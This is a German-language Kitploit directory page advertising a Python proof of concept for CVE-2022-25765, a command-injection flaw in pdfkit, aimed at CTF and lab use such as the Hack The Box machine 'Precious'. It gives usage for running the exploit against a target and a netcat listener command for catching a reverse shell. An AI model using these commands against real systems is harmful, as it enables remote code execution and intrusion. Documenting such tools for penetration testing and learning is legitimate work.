Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-25765 — Python-PoC für CVE-2022-25765, eine Command-Injection-Schwachstelle in pdfkit, die Remote-Code-Ausführung über manipulierte PDF-Erstellung ermöglicht. | Kitploit
Tools/GitHubGitHub/innocentx0/cve-2022-25765
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & Bildung
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Python-PoC für CVE-2022-25765, eine Command-Injection-Schwachstelle in pdfkit, die Remote-Code-Ausführung über manipulierte PDF-Erstellung ermöglicht.

Repository anzeigen
vor 16h 55mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-25765 — pdfkit

PoC für CVE-2022-25765, das verwundbare Versionen von pdfkit betrifft.

Getestet mit pdfkit 0.8.6.

Anforderungen

  • Python 3.x
  • requests
  • colorama

Abhängigkeiten installieren:

root@kitploit:~
pip3 install -r requirements.txt

Oder manuell:

root@kitploit:~
pip3 install requests colorama

Verwendung

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

Beispiel: Einen Listener starten

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

Einrichtung

Repository klonen:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

Die Anforderungen installieren:

root@kitploit:~
pip3 install -r requirements.txt

Führe den PoC gegen dein Laborziel aus.

Schwachstelle

CVE-2022-25765 ist eine Command-Injection-Schwachstelle in verwundbaren Versionen von pdfkit.

Das Problem hängt mit einer unzureichenden Bereinigung von benutzergesteuerten Eingaben zusammen, die an den PDF-Erzeugungsprozess übergeben werden.

Hinweise

Dieser PoC wurde hauptsächlich für Lernzwecke sowie für CTF-/Laborumgebungen erstellt.

Wenn du nach einem Ort suchst, um ihn auszuprobieren: Hack The Box : Maschine: Precious.

Haftungsausschluss

Verwende dies nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.

Ich bin nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Projekt verursacht werden.


INNOCENTx0

Tool herunterladen